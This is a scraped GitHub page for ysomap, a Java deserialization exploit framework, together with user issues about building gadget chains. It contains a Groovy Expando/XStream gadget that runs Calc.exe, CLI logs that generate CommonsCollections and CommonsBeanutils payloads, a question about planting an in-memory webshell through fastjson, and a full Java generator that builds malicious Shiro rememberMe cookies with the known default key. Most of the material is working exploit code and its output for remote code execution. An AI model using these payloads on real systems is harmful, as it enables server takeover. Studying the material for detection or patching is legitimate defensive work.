wh1t3p1g / ysomap
A helpful Java Deserialization exploit framework.
License: Apache License 2.0
Run vulnerability verification or exploitation against a batch of targets; brute-forcing is possible as well.
Example:
java -jar ysomap.jar <exploit> [<payload>] [<bullets>] var1=vul1 var2=vul2 var3=vull3
When I reproduced the Groovy Expando approach from your blog https://blog.0kami.cn/2020/04/18/java/talk-about-xstream-deserialization/ the code I wrote myself looks like this:

import com.thoughtworks.xstream.XStream;
import groovy.util.Expando;
import org.codehaus.groovy.runtime.MethodClosure;
import java.lang.reflect.Field;
import java.util.HashMap;

// closure that calls "Calc.exe".execute() when invoked
MethodClosure methodClosure = new MethodClosure("Calc.exe", "execute");
Expando expando = new Expando();
expando.setProperty("hashCode", methodClosure);
HashMap map = new HashMap();
map.put("test", expando);
// attempt to swap the entry's key for the expando via reflection
Field key = Class.forName("java.util.HashMap$Node").getDeclaredField("key");
key.setAccessible(true);
key.set(map, expando);
XStream xStream = new XStream();
String xml = xStream.toXML(map);
System.out.println(xml);
xStream.fromXML(xml);

I found that this key cannot be modified because it is final, but I also found that if I put the expando object in directly at put() time, it triggers command execution early. I can't solve this. I looked at the code in your project and I don't understand why your makemap method has to handle it the way it does.
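The ordering problem described in this issue, shown as an added example that is not code from the original issue and not ysomap's makeMap: HashMap.put() calls hashCode() on the key at insertion time, so an Expando whose "hashCode" property is already a Closure fires while the payload is being built, whereas inserting the Expando first and arming it afterwards defers the call until the receiving side rebuilds the map. The closure here only sets a flag and stands in for the MethodClosure("Calc.exe", "execute") in the issue; the allowTypesByWildcard("**") call on the reading XStream is an assumption that reproduces an XStream without a type allowlist (the default before 1.4.18).

```java
import com.thoughtworks.xstream.XStream;
import groovy.lang.Closure;
import groovy.util.Expando;

import java.util.HashMap;

// Shows when Expando.hashCode() -> Closure.call() actually runs, depending on
// whether the "hashCode" property is set before or after HashMap.put().
public class ExpandoHashMapOrder {

    // Set to true whenever the closure runs; stand-in for a command-executing closure.
    static volatile boolean closureRan = false;

    // Expando.hashCode() casts closure.call() to Integer, so the closure returns one.
    static Closure<Integer> armedClosure() {
        return new Closure<Integer>(null) {
            public Integer doCall() {
                closureRan = true;
                return 0;
            }
        };
    }

    // Wrong order (what the issue describes): arm first, then put.
    static boolean armThenPut() {
        closureRan = false;
        Expando expando = new Expando();
        expando.setProperty("hashCode", armedClosure());
        new HashMap<Object, Object>().put(expando, "v"); // put() -> hashCode() -> closure
        return closureRan;                                 // fired on the generating side
    }

    // Right order: put while hashCode() still falls back to Object.hashCode(),
    // then arm the key. Mutating a key after insertion never re-hashes it.
    static String putThenArm() {
        closureRan = false;
        Expando expando = new Expando();
        HashMap<Object, Object> map = new HashMap<>();
        map.put(expando, "v");                 // no closure yet, nothing runs
        expando.setProperty("hashCode", armedClosure());
        if (closureRan) {
            throw new IllegalStateException("closure must not fire while building");
        }
        return new XStream().toXML(map);       // MapConverter walks entries; no hashCode() call
    }

    public static void main(String[] args) {
        System.out.println("arm-then-put fired during build: " + armThenPut());

        String xml = putThenArm();
        XStream reader = new XStream();
        // Assumption: the receiving XStream has no type allowlist (pre-1.4.18 default).
        reader.allowTypesByWildcard(new String[]{"**"});
        reader.fromXML(xml);                   // HashMap rebuilt via put() -> hashCode() -> closure
        System.out.println("put-then-arm fired on deserialization: " + closureRan);
    }
}
```

On a permissive XStream the first line prints true and the second prints true only after fromXML(); an XStream 1.4.18 or later without the wildcard call rejects groovy.util.Expando before any put() happens, which is the check to run against a target before assuming the gadget applies.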
fastjson target with no outbound network access: BCEL can be used to execute commands and echo the output, but the environment is not Tomcat, so how do I inject an in-memory webshell?
When using several of the Hessian deserialisation payloads against a Hessian endpoint, the Tomcat server responds with the following stack trace:
java.lang.ClassCastException: com.sun.org.apache.xpath.internal.objects.XString cannot be cast to java.lang.String
javax.naming.ldap.Rdn$RdnEntry.getValueComparable(Rdn.java:481)
javax.naming.ldap.Rdn$RdnEntry.compareTo(Rdn.java:444)
javax.naming.ldap.Rdn$RdnEntry.compareTo(Rdn.java:420)
java.util.TreeMap.put(TreeMap.java:568)
java.util.TreeSet.add(TreeSet.java:255)
com.caucho.hessian.io.CollectionDeserializer.readList(CollectionDeserializer.java:78)
com.caucho.hessian.io.SerializerFactory.readList(SerializerFactory.java:341)
com.caucho.hessian.io.Hessian2Input.readObject(Hessian2Input.java:1945)
com.caucho.hessian.server.HessianSkeleton.invoke(HessianSkeleton.java:131)
com.caucho.hessian.server.HessianSkeleton.invoke(HessianSkeleton.java:109)
com.caucho.hessian.server.HessianServlet.service(HessianServlet.java:396)
org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
ysomap > use payload CommonsCollections3
You can choose bullets: [TransformerBullet, TransformerWithJNDIBullet, TransformerWithSleepBullet, TransformerWithURLClassLoaderBullet, TransformerWithFileWriteBullet]
ysomap payload(CommonsCollections3) > use bullet TransformerBullet
ysomap payload(CommonsCollections3) bullet(TransformerBullet) > set command whoami
ysomap payload(CommonsCollections3) bullet(TransformerBullet) > run
[+] generate CommonsCollections3 success, plz see payload.CommonsCollections3.TransformerBullet.ser
[+] generate payload(CommonsCollections3) started!
Bullet Type Not Match; Error TYPE: class [Lorg.apache.commons.collections.Transformer;
Using TransformerWithSleepBullet and TransformerBullet both give the error "Bullet Type Not Match".
My account was compromised, as a result many spam issues got created across multiple repos. I am deleting all such issues. Please check my tweet: https://x.com/arghyac35/status/1729721954909684064?s=20
The .ser generation process didn't ask for a key either (⊙o⊙)?
How should this be done?
I can't quite wrap my head around it right now 0.0
ReflectionHelper.newInstance("javax.swing.MultiUIDefaults", new Object[0]); fails with an error; it seems this function can only retrieve the first constructor.
Around line 150 of ysomap-master/core/src/main/java/ysomap/exploits/shiro/ShiroRCE1.java:
byte[] keyBytes = Strings.base64(key.getBytes());
This should base64-decode the bytes of the key string, but the Strings.base64 it calls, around line 59 of ysomap-master/common/src/main/java/ysomap/common/util/Strings.java, base64-encodes instead:
import org.apache.commons.codec.binary.Base64; // import assumed to be commons-codec

// encodes, so a caller that needs the raw key bytes gets base64 text back
public static byte[] base64(byte[] data){
    Base64 base64 = new Base64();
    return base64.encode(data);
}
This causes the ShiroRCE1 exploit to fail.
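What the reported encode/decode mix-up means in practice, as an added example that is not ysomap's code: Shiro's rememberMe cipher key is configured as a base64 string, and the Shiro 1.2.4 default "kPH+bIxk5D2deZiIxcaaaA==" decodes to a 16-byte AES key, whereas base64-encoding the string's own bytes yields 32 bytes of text that is not an AES-128 key at all. The cookie layout (random IV prepended to AES/CBC/PKCS5 ciphertext, then base64) follows Shiro's JcaCipherService defaults for the CBC-era versions; the file-path argument in main is an assumption standing in for a serialized gadget such as ysomap's obj.ser.

```java
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.SecureRandom;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

// Builds a Shiro rememberMe cookie the way the CBC-based RememberMeManager
// expects it: base64( IV || AES-CBC(key, serializedObject) ).
public class ShiroRememberMe {

    // Shiro 1.2.4's hard-coded default cipher key, exactly as it appears in its source.
    static final String DEFAULT_KEY_B64 = "kPH+bIxk5D2deZiIxcaaaA==";

    // Correct: decode the configured string to the raw AES key and sanity-check its size.
    static byte[] keyBytes(String base64Key) {
        byte[] key = Base64.getDecoder().decode(base64Key);
        if (key.length != 16 && key.length != 24 && key.length != 32) {
            throw new IllegalArgumentException("not an AES key: " + key.length + " bytes");
        }
        return key;
    }

    // The mistake reported above, reproduced for contrast: encoding the string's
    // bytes produces base64 text, a "key" the server never used.
    static byte[] buggyKeyBytes(String base64Key) {
        return Base64.getEncoder().encode(base64Key.getBytes());
    }

    static String cookie(String base64Key, byte[] serializedPayload) throws Exception {
        byte[] iv = new byte[16];
        new SecureRandom().nextBytes(iv);
        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        cipher.init(Cipher.ENCRYPT_MODE,
                    new SecretKeySpec(keyBytes(base64Key), "AES"),
                    new IvParameterSpec(iv));
        byte[] ciphertext = cipher.doFinal(serializedPayload);
        // Shiro prepends the IV to the ciphertext before base64-encoding the whole blob.
        byte[] out = new byte[iv.length + ciphertext.length];
        System.arraycopy(iv, 0, out, 0, iv.length);
        System.arraycopy(ciphertext, 0, out, iv.length, ciphertext.length);
        return Base64.getEncoder().encodeToString(out);
    }

    public static void main(String[] args) throws Exception {
        System.out.println("decoded key length: " + keyBytes(DEFAULT_KEY_B64).length);
        System.out.println("encoded-by-mistake length: " + buggyKeyBytes(DEFAULT_KEY_B64).length);
        // Assumption: args[0] is a Java-serialized gadget chain, e.g. obj.ser from ysomap.
        byte[] payload = Files.readAllBytes(Paths.get(args[0]));
        System.out.println("rememberMe=" + cookie(DEFAULT_KEY_B64, payload));
    }
}
```

Usage: java ShiroRememberMe obj.ser. Two caveats a practitioner should keep in mind: a 32-byte value would be silently accepted as AES-256 if the length check were dropped, which is why the check is explicit, and Shiro 1.4.2 and later default to AES-GCM, so this CBC layout only applies to older versions or to deployments that configure CBC explicitly.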
ysomap payload(CommonsBeanutils1) bullet(ProcessBuilderBullet) > run
[+] generate payload(CommonsBeanutils1) started!
[+] generate payload(CommonsBeanutils1) done!
[+] generate CommonsBeanutils1 success, plz see obj.ser
java.io.NotSerializableException: java.lang.ProcessBuilder
at java.io.ObjectOutputStream.writeObject0(Unknown Source)
at java.io.ObjectOutputStream.writeObject(Unknown Source)
at java.util.PriorityQueue.writeObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeWriteObject(Unknown Source)
at java.io.ObjectOutputStream.writeSerialData(Unknown Source)
at java.io.ObjectOutputStream.writeOrdinaryObject(Unknown Source)
at java.io.ObjectOutputStream.writeObject0(Unknown Source)
at java.io.ObjectOutputStream.writeObject(Unknown Source)
at ysomap.core.serializer.DefaultSerializer.serialize(DefaultSerializer.java:25)
at ysomap.core.serializer.SerializerFactory.serialize(SerializerFactory.java:52)
at ysomap.cli.Session.run(Session.java:213)
at ysomap.cli.Console.dispatch(Console.java:127)
at ysomap.cli.Console.run(Console.java:77)
at ysomap.cli.App.main(App.java:17)
ysomap payload(CommonsBeanutils1) bullet(ProcessBuilderBullet) > show options
My classmate couldn't get it to build on Mac, but it built fine on my Windows machine, and the jar copied over to the Mac works normally.
Could the developer put a compiled jar in the Release tag next time?